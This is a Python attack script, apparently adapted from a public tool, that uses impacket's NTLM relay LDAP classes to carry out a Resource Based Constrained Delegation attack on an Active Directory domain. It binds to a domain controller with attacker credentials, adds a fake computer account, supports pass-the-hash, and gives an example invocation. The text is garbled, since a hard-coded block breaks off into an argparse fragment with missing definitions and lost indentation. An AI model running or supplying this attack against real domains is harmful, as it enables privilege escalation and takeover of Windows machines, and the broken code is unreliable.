import ldapdomaindump
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
attackeraccount = ('DOMAIN\\USER', 'PASSWORD')
fakecomputer = 'FAKE_COMPUTER_NAME'
targetcomputer = 'TARGET_COMPUTER_NAME'
dc = 'DC_IP'
targetsam = '{}$'.format(targetcomputer)
fakecomputersam = '{}$'.format(fakecomputer)
c = NTLMRelayxConfig()
c.addcomputer = fakecomputer
c.target = dc
logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam))
logging.info('Initializing LDAP connection to {}'.format(dc))
#tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL)
logging.info('Using {} account with password ***'.format(attackeraccount[0]))
conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE)
conn.bind()
logging.info('LDAP bind OK')
logging.info('Initializing domainDumper()')
help=
'domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)'
)
if len(sys.argv) == 1:
parser.print_help()
print(
'\nExample: ./rbcd.py -dc-ip 10.10.10.1 -t WEB -f FAKECOMP ECORP\\test:Spring2020'
)
sys.exit(1)
options = parser.parse_args()
attackeraccount = options.identity.split(':')
c = NTLMRelayxConfig()
c.addcomputer = options.f
c.target = options.dc_ip
if options.hashes:
# support only :NTHASH format (no LM)
attackerpassword = ("aad3b435b51404eeaad3b435b51404ee:" +
options.hashes.split(":")[1]).upper()
else:
attackerpassword = attackeraccount[1]
logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info(
'Starting Resource Based Constrained Delegation Attack against {}$'.format(
options.t))
